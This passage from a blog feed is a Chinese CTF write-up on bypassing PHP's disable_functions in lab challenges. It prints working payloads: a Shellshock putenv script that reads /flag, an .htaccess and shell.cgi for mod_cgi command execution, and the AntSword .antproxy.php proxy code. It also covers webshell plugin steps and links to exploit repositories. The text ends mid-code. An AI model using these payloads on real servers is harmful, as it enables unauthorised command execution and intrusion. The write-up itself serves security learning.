<script id="hbeData" type="hbeData" data-hmacdigest="43b9e6dc09a8cc1b1d8c66fd408c77feb9aa763946ece7a4b0a72d21876dd7c3">709e820b2f5bb6db36bae87ed03a646f003cb0ce380f747ce4c88c56db22ab5d4185982fe20a41655de1394a5eceab58e21807493670c6615c8e8242ca46bffad9a1b81b645f9265d7dcb889f7879afeeacd2ac55f245aef6303c7f519362152373411c74c6b8780dce51847d73a6477709fd59641feb9af07d20f42a44b033ed79dda6ed6f98348586cf744d49d850e4ec5bf9d0a470c636f7e9ac709ccf9e657bb4b3f29d6a79cb3c4562fd379c8120eea9e54aa23d4b9e094ebd1a55157e901ea92fd7872064f902faf8f672f3dbacd1f701c31b68649f502bc58470b1a6ba2b456d4971c4296706af0632fe71ca5b775440d451ec69659cfd79a256f4310e0e6773c0f1c6b4867bd300c133430c964c2bc5c1b161aafe9f8c941c1e423024a0cd0bab8f1a978d2ba5ce5519199d2216ffd7b341a4f53763b017ebf0e5f4470746938144ee90076cb2f87fc64388b511de97200458a5adf9ce7031efc50c9f6cdefea07d2f60eb40d42b7ac3de7ec9be3b06cf621b5c7f9f7265011a8dc829a0c78b49751c8d2b40baefb9890b6c3e345c9e1e577129d4e1c8e6b0fdb812115f90d6434b94ed0e37b193ca6e074d94a34ac3efd7fe230dd850f156e84f2f4412f6ce15da32e12157eb6241d1a2b84624ae1dbf74c9393e0828656a1a4e9f20c1cf5b302ab34f904ea1ccab19bdaea57436d45ec541c213942d5ab5b22b8fa7d068ec382fac12604080c8fa82ebb295942a32a5ba6e1da87e93b9a9b4a8ed092cd22952f50f67ef0a91842214cb74dda4cf88bdf399678a9f7c3d708f9c8f05c0f56e3cd5e3016b0b081310c4507bbe92d8014926100fb764e069e91d57a08a0f55537ac7c092c44bea8768392f229647b5d5040c32f526fe9b8f43a19d3dfef44c06684220be3d7216512340bd91e5db00132921ac485b8cc127b1b2432b47ee66523ed7d703c49f70eab1568502c5e770b2431f9950809336b0d45dad9aaee3b460cb7e66f381a90ddcdf1443a1144152b13b7866d946e3ee1cfe67d5fea8679a2abba370acb31b61f71a4d1c77af78b3a84c78588be8b593cc26a78a5283b41fb88283b088127c17fdf8e52a4555324398b28e0f76c28065a29869c9ea15448e13318c93c29616b46bbf11c9ada95379294f02e14112f36457f96689eaf2da5adca49ad4fa0cb3e14b25b1419d58f7bba5f4f136b9404c417e7ab7348953df3058ef3451045d91fd7e7dc46096a74d05a8e6832ff9ab907663605b4b1ba37c43f1c10224734783d40ae0c34b7818f6c5a2dd996fc0288af2daf5e9210b89176c9852a5a790318576a6a9711f89bfc9f2a03dd69a06f4e94bcafd65ffd10c03fd6ccf383b31098240975bab3ec8d3f70212a39b691fd42bdeaa1ab2a670f7206f824c3f69e99b723e06be1b0a651134d7a7398b0ebbb2ae91893474afdab96157018abdadb3f174b2acf2e20ef477ab31314e25b23605fb72f5088ceefb5b1d771f8771f6f1f7b79e569512eac3864abf745248310e5d3bf8803faf5143d8ed5dd8b2452e0c5b14c2e3f5602a64675b96642fcd662021b92ce6dd58c1e563bcdb6c00fa3fab6f6f1b659b7f16d45c90481dc0dc4b38a7f544e480f47160de068b21849f752b80970c8be72443b8cc8797bb833ae9daf8eed02a52935a37d43209805180d7ee32c0b6aa514998dcf7ae6e389c34dead7c5318ba9b2ed468a0f55bafcd9762ea0ea741bced5d080d483c5fa4ea617aa82e36a36043ef2633539c06fbe4304786a8e548e170822f1817b0fdd370e82ff0d0c269707aaeb286e074ee1274a31a4e8366126c81b3e4e6b0d76e86798b87d5a03b12be8ebeb38c6be5de48d1978982101261055ef56ad2369bd5d512fe5dddf770a37220b145447e0798ba02ed90f0328d2f9046f469bf7e30882b334843c614b9ba10fdce47cc249140cbeec8ed72a3e712257dd387f6498b3622f2073654dadab2c29d6906a218af7dc87c9fab3432a33c25ee1273ad7322a42468eaea69ca5732af4feb47cbe94016ee49fd6a25f3de73955c33f77617ed90ae58ba6e96047a3b35c02909948d364cf0c993a7568e67eac3cebaf9231e7ff06151bdef0e0a5163187a071177583718e92d7abed9fbf057ad9306fd5b9a088452656977048e661e06bc74c5b53f2c790ca6d82748a3e5ac0044c0cd81e578ccac6374b21e92881d38d281451940c5016086c8fb5a1cd9c08102e09a56920da2ad9652e6e3d4ed2bd00eb4ac33d1874a4a98a1908e879fe805a8222942cd1017e7d0bfb44b4a75e541ce51b18d66b9dadc2989c1995e7de039147badfcb8f307c697af0bdbf864a6a9892b9894124bc4bfe22f3694d1b7029bbcea4fd925bc1194cd83d09f6cbfc52e27df52f41f64cedc01208253dddba27e7e6f9cd851048aa17eba5e81284a55a57366c9234ef609a3f94b2ff8d44519a93d14442142c304a4d00e5511fb7b1199399c12fa40eef4e53e619069139a35425b6a22056b2a30040b334f97667d48062374f4e1557dbd5f243ab236b54e92286dfe17474425aaef0fce4ed069651192cea7b488a84fe85caff20de608ec0c3ee2662c5860ba27d0e5717dcf1f8801a91cb82e8bbadea67f3d93b2949751369586288a07fd489092b39f2dbdbd5ed141d3a98da638526c5a4faf8c6db0431aad55a16ce5c69a221ccbfc65c1e09ed8c4b96bd0f4422ed509f3912c990c7e77940a0b2c06dcb7420e3ffb48a67bd342b9d93423822e0368117fe696f57a9bda131f0da74134028c43941f70bc32db4cb65ef2b0e84a5d26b1f7d16574b0ce4638e2954edb053a7ebd6c37a30e75144120c244f546163ab354469b712e3937c384e026c1da98572b0a603d9c0138c5729c66c31c1eea1557b8e85c453598c4575b92da2c602bb853ff19e51a860d16debdf95781329ab64ed8c7ec02adcc89014fffd63fed8701f585207d5edf7c215dc6a6493090d4f90438a30b923c4fc71da9fa85b859c64f3f84c55908730920997283f5974018f9acc18d789e0d63568a28257d70c3e075c8749bad972f38ed1116df0968e0fa94c1746bbbe197566f084f3eb59727f110bd0e1add5fb7dd2cd62eb6a9ee9e59b6de102be9d038ac006ea25c3940df06a6b4c5845b9fb5b6110e2c9d0e0dda4d7e45332e00d3b00ac14b0da2afc6084ac12cbb4439bbd9652dcf3a977cc872d57bc8b687c437f515f13c88e3c329b7ca45b99f911de5b636c3ae177113e957c917aeb716e58bae612c85e9ccaed988b46cac9bec13c81ad6dec2d654a435bd58a9df144eb17f4a33aab95481cd438702f97f171397dabce366bd112436c016896cd859dc6207715a0917f8d4ade1432ad04fc760687127c5ac35167101b99466ad7e91ac6a01bd9f2b2770eb54bbb48ece1f17f540d2d80c08b2e84de423cbe53be1f4d0c5cb3957deab01da340ee9913a475735aff67c9d74709a340b73282813bc414000860cf3dace577619cb39ac3b5c9ee0b8ed6b394b8bde90d7c031fe51a0209a02c444b4ea1de6d546a15a5c6853ecc099327892100755aadf8b1fc92c68b0e3e4c925a2c468a605d94af16da3c200324ad24c20487fad14b4905cab92ea568e692708fea93bf65754248b6b424d440cf05e918ff133c7a400777bac7dbb6837183773dcd3a6fec58dcdc38914a60ca4f271b11f31a7022fbf2d821487b272f4e8a848d9f9d8e142144f10f58e4afd6f5b5c94bd19f21a496d2716e1aa12e06e44345fa151b1c746bb192a7399d0d4fc9fd8b45cbba259d70ecc86396cd2fd5a3d3f46f447893da8c0bb167099f82814b481eb984f2b619bf0ffabee7872532bc30917b79d0be6483954b56bacd49f3c8cd7b8fe6b52daa61b3b6e900e9c3bfe2803346c055d9e66f7a1e4a88e9afc5f513af3cb54859e994317378abc7e309dc3288f9982c9f8b89a6ff98ebe3e865061ccd70da63bbd72fbf931af840a9b8b17a339d3fd2ca2ddbb7353f7354553da08d636c44adf61c30028b04105a1e3621cf76cc850a1a82a411f3daa014c5c5e3c41c45d9c6b6e668ae44b0fff7f92674ddb30960e4f5474f432578dc5adb3c8a4e3bad1384dc7696b56bdfe39873eeff05f03e511d2d189fa2a4ad8bd1e1305bb20111139b409e97bc5b58a8a1df5868da336af249d049b3859599ba0867ac609a4b124c03d45e84700fb95afd9c4d7ac060301aee8b01348c14bb9cc9c4cb0e3dbe51445d7e0b8c128acff958e38e0f748c401cdd5918fe5131458cfb7970751bbf413721865df9c972db1cf88c310cc32d7db8ba2d29a358be2a7436be99c0f76cc7f809ea9d6ecab716c95553b93d387d64c27bcec6658d7c2cce6fd9fe455175d5fb3afdc1d951add7</script>
<div class="hbe hbe-content">
<div class="hbe hbe-input hbe-input-default">
<input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
<label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
<span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
</label>
</div>
</div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
<categories>
<category>随笔</category>
</categories>
</entry>
<entry>
<title>Bypass disable_function</title>
<url>/2023/07/Bypass%20disable_function/</url>
<content><![CDATA[<h2 id="LD-PRELOAD"><a href="#LD-PRELOAD" class="headerlink" title="LD_PRELOAD"></a>LD_PRELOAD</h2><p>时间紧 于是先采用最省时的方法<br>先蚁剑连<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16.png" alt="在这里插入图片描述"><br>发现打不开 flag 文件<br>要使用蚁剑插件<code>绕过disabled function</code></p>
<blockquote>
<p>如果蚁剑插件市场打不开的话可以去 github 搜<br>github 上有说明 按着他的安</p>
</blockquote>
<p>连上之后在蚁剑主页面右键 webshell 使用该插件<br>按照步骤操作<br>成功后把 webshell 地址改为 http://……/.antproxy.php<br>在连上就能 tac 了<br><code>tac /flag</code></p>
<h2 id="ShellShock"><a href="#ShellShock" class="headerlink" title="ShellShock"></a>ShellShock</h2><p>进去发现连不上<br>查了下大佬博客说是环境不正常<br>原理如下</p>
<blockquote>
<p>如果环境变量的值以字符() {开头,那么这个变量就会被当作是一个导入函数的定义(Export),这种定义只有在 shell 启动的时候才生效。</p>
</blockquote>
<p>脚本</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$cmd</span> = <span class="string">" tac /flag>/var/www/html/1.txt"</span>;</span><br><span class="line"><span class="title function_ invoke__">putenv</span>(<span class="string">"PHP_DMIND=() { :; };<span class="subst">$cmd</span>"</span>);</span><br><span class="line"><span class="title function_ invoke__">error_log</span>(<span class="string">"dmind"</span>,<span class="number">1</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">"/var/www/html/1.txt"</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>用蚁剑传进去后<br>浏览器访问这个文件即可在 1.txt 看到 flag<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254011280-13.png" alt="在这里插入图片描述"></p>
<h2 id="Apache-Mod-CGI"><a href="#Apache-Mod-CGI" class="headerlink" title="Apache Mod CGI"></a>Apache Mod CGI</h2><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254013871-16.png" alt="在这里插入图片描述"></p>
<p>如果.htaccess 文件被攻击者修改的话,攻击者就可以利用 apache 的 mod_cgi 模块,直接绕过 PHP 的任何限制,来执行系统命令</p>
<blockquote>
<p>1.Mod CGI 就是把 PHP 做为 APACHE 一个内置模块,让 apache http 服务器本身能够支持 PHP 语言,不需要每一个请求都通过启动 PHP 解释器来解释 PHP. 2.它可以将 cgi-script 文件或者用户自定义标识头为 cgi-script 的文件通过服务器运行. 3.在.htaccess 文件中可定制用户定义标识头 4.添加 Options +ExecCGI,代表着允许使用 mod_cgi 模块执行 CGI 脚本 5.添加 AddHandler cgi-script .cgi,代表着包含.cgi 扩展名的文件都将被视为 CGI 程序</p>
</blockquote>
<p>条件</p>
<ol>
<li>必须是 apache 环境</li>
<li>mod_cgi 已经启用</li>
<li>必须允许.htaccess 文件,也就是说在 httpd.conf 中,要注意 AllowOverride 选项为 All,而不是 none</li>
<li>必须有权限写.htaccess 文件</li>
</ol>
<h3 id="脚本:"><a href="#脚本:" class="headerlink" title="脚本:"></a>脚本:</h3><p>.htaccess</p>
<figure class="highlight handlebars"><table><tr><td class="code"><pre><span class="line"><span class="language-xml">Options +ExecCGI AddHandler cgi-script .cgi</span></span><br></pre></td></tr></table></figure>
<p>shell.cgi</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/sh</span></span><br><span class="line">echo&&cd "/var/www/html/backdoor";cat shell.cgi;echo 96642;pwd;echo c26b314f4b</span><br></pre></td></tr></table></figure>
<h3 id="简单方法:"><a href="#简单方法:" class="headerlink" title="简单方法:"></a>简单方法:</h3><p>蚁剑连<br>还是那个插件 bypass!<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254016967-19.png" alt="在这里插入图片描述"></p>
<h2 id="PHP-FPM"><a href="#PHP-FPM" class="headerlink" title="PHP-FPM"></a>PHP-FPM</h2><ol>
<li>FPM 是 fast-cgi 的协议解析器</li>
<li>webserver 使用 cgi 协议封装好用户的请求发送给 FPM</li>
<li>FPM 按照 cgi 的协议将 TCP 流解析成真正的数据</li>
</ol>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254019084-22.png" alt="在这里插入图片描述"><br>蚁剑 bypass<br>模式:FPM<br>地址:127.0.0.1:9000 或 localhost:9000<br>植入后修改 shell 地址为 http://……/.antproxy.php</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_client_header</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable">$headers</span>=<span class="keyword">array</span>();</span><br><span class="line"> <span class="keyword">foreach</span>(<span class="variable">$_SERVER</span> <span class="keyword">as</span> <span class="variable">$k</span>=><span class="variable">$v</span>){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$k</span>,<span class="string">'HTTP_'</span>)===<span class="number">0</span>){</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">preg_replace</span>(<span class="string">'/^HTTP/'</span>, <span class="string">''</span>, <span class="variable">$k</span>));</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace_callback</span>(<span class="string">'/_\w/'</span>,<span class="string">'header_callback'</span>,<span class="variable">$k</span>);</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace</span>(<span class="string">'/^_/'</span>,<span class="string">''</span>,<span class="variable">$k</span>);</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'_'</span>,<span class="string">'-'</span>,<span class="variable">$k</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$k</span>==<span class="string">'Host'</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="variable">$headers</span>[]=<span class="string">"<span class="subst">$k</span>:<span class="subst">$v</span>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$headers</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">header_callback</span>(<span class="params"><span class="variable">$str</span></span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">strtoupper</span>(<span class="variable">$str</span>[<span class="number">0</span>]);</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parseHeader</span>(<span class="params"><span class="variable">$sResponse</span></span>)</span>{</span><br><span class="line"> <span class="keyword">list</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>)=<span class="title function_ invoke__">explode</span>(<span class="string">"</span></span><br><span class="line"><span class="string">"</span>,<span class="variable">$sResponse</span>, <span class="number">2</span>);</span><br><span class="line"> <span class="variable">$ret</span>=<span class="keyword">array</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/^HTTP/1.1 d{3}/'</span>, <span class="variable">$sResponse</span>)){</span><br><span class="line"> <span class="variable">$ret</span>=<span class="title function_ invoke__">parseHeader</span>(<span class="variable">$sResponse</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$ret</span>;</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">set_time_limit</span>(<span class="number">120</span>);</span><br><span class="line"><span class="variable">$headers</span>=<span class="title function_ invoke__">get_client_header</span>();</span><br><span class="line"><span class="variable">$host</span> = <span class="string">"127.0.0.1"</span>;</span><br><span class="line"><span class="variable">$port</span> = <span class="number">61921</span>;</span><br><span class="line"><span class="variable">$errno</span> = <span class="string">''</span>;</span><br><span class="line"><span class="variable">$errstr</span> = <span class="string">''</span>;</span><br><span class="line"><span class="variable">$timeout</span> = <span class="number">30</span>;</span><br><span class="line"><span class="variable">$url</span> = <span class="string">"/index.php"</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">'QUERY_STRING'</span>])){</span><br><span class="line"> <span class="variable">$url</span> .= <span class="string">"?"</span>.<span class="variable">$_SERVER</span>[<span class="string">'QUERY_STRING'</span>];</span><br><span class="line">};</span><br><span class="line"><span class="variable">$fp</span> = <span class="title function_ invoke__">fsockopen</span>(<span class="variable">$host</span>, <span class="variable">$port</span>, <span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$timeout</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="variable">$fp</span>){</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$method</span> = <span class="string">"GET"</span>;</span><br><span class="line"><span class="variable">$post_data</span> = <span class="string">""</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>]==<span class="string">'POST'</span>) {</span><br><span class="line"> <span class="variable">$method</span> = <span class="string">"POST"</span>;</span><br><span class="line"> <span class="variable">$post_data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">'php://input'</span>);</span><br><span class="line">}</span><br><span class="line"><span class="variable">$out</span> = <span class="variable">$method</span>.<span class="string">" "</span>.<span class="variable">$url</span>.<span class="string">" HTTP/1.1\r\n"</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">"Host: "</span>.<span class="variable">$host</span>.<span class="string">":"</span>.<span class="variable">$port</span>.<span class="string">"\r\n"</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">'CONTENT_TYPE'</span>])) {</span><br><span class="line"> <span class="variable">$out</span> .= <span class="string">"Content-Type: "</span>.<span class="variable">$_SERVER</span>[<span class="string">'CONTENT_TYPE'</span>].<span class="string">"\r\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">"Content-length:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$post_data</span>).<span class="string">"\r\n"</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="title function_ invoke__">implode</span>(<span class="string">"\r\n"</span>,<span class="variable">$headers</span>);</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">"\r\n\r\n"</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">""</span>.<span class="variable">$post_data</span>;</span><br><span class="line"><span class="title function_ invoke__">fputs</span>(<span class="variable">$fp</span>, <span class="variable">$out</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="string">''</span>;</span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$row</span>=<span class="title function_ invoke__">fread</span>(<span class="variable">$fp</span>, <span class="number">4096</span>)){</span><br><span class="line"> <span class="variable">$response</span> .= <span class="variable">$row</span>;</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line"><span class="variable">$pos</span> = <span class="title function_ invoke__">strpos</span>(<span class="variable">$response</span>, <span class="string">"\r\n\r\n"</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$response</span>, <span class="variable">$pos</span>+<span class="number">4</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$response</span>;</span><br></pre></td></tr></table></figure>
<h2 id="UAF"><a href="#UAF" class="headerlink" title="UAF"></a>UAF</h2><h3 id="GC"><a href="#GC" class="headerlink" title="GC"></a>GC</h3><blockquote>
<p>利用的是 PHP Garbage Collector 程序中的堆溢出触发</p>
</blockquote>
<p><a href="https://bugs.php.net/bug.php?id=72530">题目附件</a><br><em>其实蚁剑的 reference 就有这附件 包括后面的大佬脚本</em><br>可以用蚁剑一把梭<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254029334-25.png" alt="在这里插入图片描述"></p>
<p>另附<br><code>[大佬poc](https://github.com/mm0r1/exploits)</code><br>UAF 的脚本里面都有<br><code>tql!</code></p>
<h3 id="Json-Serializer-UAF"><a href="#Json-Serializer-UAF" class="headerlink" title="Json Serializer UAF"></a>Json Serializer UAF</h3><blockquote>
<p>漏洞利用 json 在序列化中的堆溢出触发 bypass,漏洞为 bug #77843</p>
</blockquote>
<p>蚁剑一把梭</p>
<h3 id="Backtrace-UAF"><a href="#Backtrace-UAF" class="headerlink" title="Backtrace UAF"></a>Backtrace UAF</h3><blockquote>
<p>漏洞利用的是 debug_backtrace 这个函数,可以利用该函数的漏洞返回已经销毁的变量的引用达成堆溢出,漏洞为 bug #76047</p>
</blockquote>
<h2 id="FFI"><a href="#FFI" class="headerlink" title="FFI"></a>FFI</h2><p><a href="https://www.laruence.com/2020/03/11/5475.html">PHP FFI 详解</a></p>
<blockquote>
<p><code>**disabled function:**</code><br>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail,system,putenv</p>
</blockquote>
<h2 id="iconv"><a href="#iconv" class="headerlink" title="iconv"></a>iconv</h2><ul>
<li>github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9/</li>
<li><a href="https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80">https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80</a></li>
</ul>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_client_header</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable">$headers</span>=<span class="keyword">array</span>();</span><br><span class="line"> <span class="keyword">foreach</span>(<span class="variable">$_SERVER</span> <span class="keyword">as</span> <span class="variable">$k</span>=><span class="variable">$v</span>){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$k</span>,<span class="string">'HTTP_'</span>)===<span class="number">0</span>){</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">preg_replace</span>(<span class="string">'/^HTTP/'</span>, <span class="string">''</span>, <span class="variable">$k</span>));</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace_callback</span>(<span class="string">'/_\w/'</span>,<span class="string">'header_callback'</span>,<span class="variable">$k</span>);</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace</span>(<span class="string">'/^_/'</span>,<span class="string">''</span>,<span class="variable">$k</span>);</span><br><span class="line"> <span class="variable">$k</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'_'</span>,<span class="string">'-'</span>,<span class="variable">$k</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$k</span>==<span class="string">'Host'</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="variable">$headers</span>[]=<span class="string">"<span class="subst">$k</span>:<span class="subst">$v</span>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$headers</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">header_callback</span>(<span class="params"><span class="variable">$str</span></span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">strtoupper</span>(<span class="variable">$str</span>[<span class="number">0</span>]);</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parseHeader</span>(<span class="params"><span class="variable">$sResponse</span></span>)</span>{</span><br><span class="line"> <span class="keyword">list</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>)=<span class="title function_ invoke__">explode</span>(<span class="string">"</span></span><br><span class="line"><span class="string">"</span>,<span class="variable">$sResponse</span>, <span class="number">2</span>);</span><br><span class="line"> <span class="variable">$ret</span>=<span class="keyword">array</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/^HTTP/1.1 d{3}/'</span>, <span class="variable">$sResponse</span>)){</span><br><span class="line"> <span class="variable">$ret</span>=<span class="title function_ invoke__">parseHeader</span>(<span class="variable">$sResponse</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$ret</span>;</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">set_time_limit</span>(<span class="number">120</span>);</span><br><span class="line"><span class="variable">$headers</span>=<span class="title function_ invoke__">get_client_header</span>();</span><br><span class="line"><span class="variable">$host</span> = <span class="string">"127.0.0.1"</span>;</span><br><span class="line"><span class="variable">$port</span> = <span class="number">63947</span>;</span><br><span class="line"><span class="variable">$errno</span> = <span class="string">''</span>;</span><br><span class="line"><span class="variable">$errstr</span> = <span class="string">''</span>;</span><br><span class="line"><span class="variable">$timeout</span> = <span class="number">30</span>;</span><br><span class="line"><span class="variable">$url</span> = <span class="string">"/index.php"</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">'QUERY_STRING'</span>])){</span><br><span class="line"> <span class="variable">$url</span> .= <span class="string">"?"</span>.<span class="variable">$_SERVER</span>[<span class="string">'QUERY_STRING'</span>];</span><br><span class="line">};</span><br><span class="line"><span class="variable">$fp</span> = <span class="title function_ invoke__">fsockopen</span>(<span class="variable">$host</span>, <span class="variable">$port</span>, <span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$timeout</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="variable">$fp</span>){</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$method</span> = <span class="string">"GET"</span>;</span><br><span class="line"><span class="variable">$post_data</span> = <span class="string">""</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>]==<span class="string">'POST'</span>) {</span><br><span class="line"> <span class="variable">$method</span> = <span class="string">"POST"</span>;</span><br><span class="line"> <span class="variable">$post_data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">'php://input'</span>);</span><br><span class="line">}</span><br><span class="line"><span class="variable">$out</span> = <span class="variable">$method</span>.<span class="string">" "</span>.<span class="variable">$url</span>.<span class="string">" HTTP/1.1\r\n"</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">"Host: "</span>.<span class="variable">$host</span>.<span class="string">":"</span>.<span class="variable">$port</span>.<span class="string">"\r\n"</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">'CONTENT_TYPE'</span>])) {</span><br><span class="line"> <span class="variable">$out</span> .= <span class="string">"Content-Type: "</span>.<span class="variable">$_SERVER</span>[<span class="string">'CONTENT_TYPE'</span>].<span class="string">"\r\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">"Content-length:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$post_data</span>).<span class="string">"\r\n"</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="title function_ invoke__">implode</span>(<span class="string">"\r\n"</span>,<span class="variable">$headers</span>);</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">"\r\n\r\n"</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">""</span>.<span class="variable">$post_data</span>;</span><br><span class="line"><span class="title function_ invoke__">fputs</span>(<span class="variable">$fp</span>, <span class="variable">$out</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="string">''</span>;</span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$row</span>=<span class="title function_ invoke__">fread</span>(<span 